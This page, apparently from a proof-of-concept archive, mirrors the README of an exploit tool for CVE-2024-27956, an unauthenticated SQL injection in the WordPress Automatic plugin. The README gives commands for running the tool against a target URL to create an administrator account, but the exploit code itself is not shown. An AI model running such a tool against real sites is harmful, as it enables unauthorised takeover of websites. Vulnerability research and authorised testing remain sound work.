Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-27956 PoC — WordPress Automatic plugin <= 3.92.0 - Unauthenticated Arbitrary SQL Execution vulnerability

Source
https://github.com/devsec23/CVE-2024-27956
Associated Vulnerability
Title:WordPress Automatic plugin <= 3.92.0 - Unauthenticated Arbitrary SQL Execution vulnerability (CVE-2024-27956)
Description:Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.
Description
CVE-2024-27956 - WP Automatic SQL Injection Exploit Tool
Readme



# WP Automatic Plugin SQL Injection Exploit (CVE-2024-27956)

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Vulnerability](https://img.shields.io/badge/CVE-2024-27956-critical-red)

A proof-of-concept exploit for the SQL injection vulnerability in WP Automatic plugin (CVE-2024-27956) affecting WordPress sites.

## 📌 Description

This exploit targets a critical unauthenticated SQL injection vulnerability in the WP Automatic plugin (versions < 3.9.2.0) for WordPress. The vulnerability allows attackers to create administrative users and gain full control of vulnerable websites.

## 🚀 Features

- Automated vulnerability verification
- Admin user creation with configurable credentials
- Automatic strong password generation
- Clean command-line interface

## 🛠️ Installation

```bash
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
```

## 💻 Usage

### Basic exploitation:
```bash
python3 exploit.py http://vulnerable-site.com
```

### Custom username and password:
```bash
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
```

### Using a proxy:
```bash
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
```

## 📋 Options

```
positional arguments:
  url                   Target WordPress URL

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username for the new admin account
  -p PASSWORD, --password PASSWORD
                        Password for the new admin account

```

## ⚠️ Legal Disclaimer

This tool is provided for **educational and authorized penetration testing purposes only**. The developer is not responsible for any misuse of this software. Always obtain proper authorization before testing any systems.

## 📜 License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## 🔗 References

- [CVE-2024-27956 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-27956)
- [WP Automatic Plugin](https://wordpress.org/plugins/wp-automatic/)
- [WordPress Security Advisory](https://wordpress.org/news/category/security/)
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →